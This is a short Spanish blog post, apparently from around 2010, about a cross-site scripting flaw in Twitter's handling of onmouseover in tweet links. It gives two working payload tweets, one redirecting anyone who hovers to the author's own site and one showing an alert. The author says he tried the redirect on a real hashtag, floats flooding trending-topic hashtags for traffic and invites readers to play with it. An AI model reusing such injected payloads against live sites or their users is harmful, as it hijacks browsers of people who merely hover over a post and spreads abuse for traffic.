vulnerabilidad

La que ha liado Twitter!!

Una vulnerabilidad en el método onmouseover se esta convirtiendo en la broma de moda en Twitter.. el problema es que esta vulnerabilidad de broma no tiene nada ya que permite ejecutar código javascript solo al pasar el ratón por encima de nuestro twitt.. Yo he probado a hacer una prueba con el hashtag #zinemaldia. Imaginaos las de visitas que podría conseguir bombardeando los hashtags de los trending topics.

La sentencia que he probado es la siguiente:

[code lang=”python”]
#zinemaldia http://twitter.com/RainbowTwtr#@”onmouseover=”javascript:window.location = ‘http://www.ikeralbeniz.net/';”/
[/code]

Lo que hago es una redirección a mi sitio.. por lo que si queréis hacer un poco el tonto podéis probar:

[code lang=”python”]
#zinemaldia http://twitter.com/RainbowTwtr#@”onmouseover=”javascript: alert(‘no me pises por favor!’);”/
[/code]

 Scroll to top